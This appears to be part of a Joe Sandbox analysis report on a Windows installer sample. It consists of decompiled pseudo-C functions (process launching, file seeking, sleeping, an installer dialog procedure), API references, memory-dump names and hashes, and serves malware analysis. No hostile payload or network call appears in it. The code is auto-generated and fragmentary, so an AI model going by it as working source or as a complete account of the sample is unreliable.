Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C

Uniqueness

Uniqueness Score: -1.00%

Function 00405874 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405874(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}

0x00405874
0x00405879
0x0040587d
0x00405883
0x00405889

APIs

ShellExecuteExW.SHELL32(?), ref: 00405883

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404216(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a208, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404224
0x0040422a

APIs

SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032F5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403303
0x00403309

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404203(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x4236e4, _a4); // executed
				return _t2;
			}

0x0040420d
0x00404213

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052B0(0xffffffeb, _t7); // executed
				_t9 = E00405831(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E004066D7(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406193( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f06
0x00401f0b
0x00401f11
0x00401f16
0x00401f1a
0x00402885
0x00401f20
0x00401f23
0x00401f26
0x00401f2e
0x00401f3d
0x00401f3f
0x00401f3f
0x00401f30
0x00401f34
0x00401f34
0x00401f2e
0x00401f46
0x00401f47
0x00401f47
0x00402ac2
0x00402ace

APIs

Part of subcall function 004052B0: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
Part of subcall function 004052B0: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00403233), ref: 0040530B
Part of subcall function 004052B0: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll), ref: 0040531D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B

Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47

Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A

Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: c16697fcb2bd3d13e2a0f714b19764dceb2bd972e2531188fe870dcb6e060f9f
Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
Opcode Fuzzy Hash: c16697fcb2bd3d13e2a0f714b19764dceb2bd972e2531188fe870dcb6e060f9f
Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C15(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402ac2
0x00402ace

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 631673ee5c1514c42db72881fe5300a3541e6f73d544da548d52187aa9158ecf
Instruction ID: a3662d66bb57f0e4aff7a204df28f74e708ba92ca424d5dc4d08b62f06a02aad
Opcode Fuzzy Hash: 631673ee5c1514c42db72881fe5300a3541e6f73d544da548d52187aa9158ecf
Instruction Fuzzy Hash: F6D0A773F141008FD720EBB8BE8945E73F8E7803193208837E102F11D2E578C8528A6D

Uniqueness

Uniqueness Score: -1.00%

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}

0x10001225
0x1000122b

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404C2C(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a248;
				_t282 = 0;
				_v24 =  *0x42a214 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a21d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404B7A(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a21c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x4236cc;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x4236e0;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x4236cc = _t282;
								 *0x4236e0 = _t282;
								 *0x42a280 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a21d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404BFA();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x4236e0;
									_t195 =  *0x42a248;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a24c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t282) {
											E00404B35(0x3ff, 0xfffffffb, E00404B4D(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a24c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x4236e0);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a280 = _t306;
					 *0x4236e0 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t252 = LoadBitmapW( *0x42a200, 0x6e);
					 *0x4236d4 =  *0x4236d4 | 0xffffffff;
					_t313 = _t252;
					 *0x4236dc = SetWindowLongW(_v8, 0xfffffffc, E00405224);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236cc = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236cc);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E0040626E(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004041E1(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004041E1(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x4236e0 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x4236e0 + _t316 * 4) = _t276;
									_t284 =  *( *0x4236e0 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a24c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404216(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404216(_v12);
								L91:
								return E00404248(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404c3b
0x00404c4c
0x00404c51
0x00404c59
0x00404c5f
0x00404c67
0x00404c75
0x00404c78
0x00404e99
0x00404ea0
0x00404eb4
0x00404ea2
0x00404ea4
0x00404ea7
0x00404ea8
0x00404eaf
0x00404eaf
0x00404ec0
0x00404ece
0x00404ed1
0x00404ee7
0x00404f5c
0x00404f5f
0x00404f61
0x00404f6b
0x00404f79
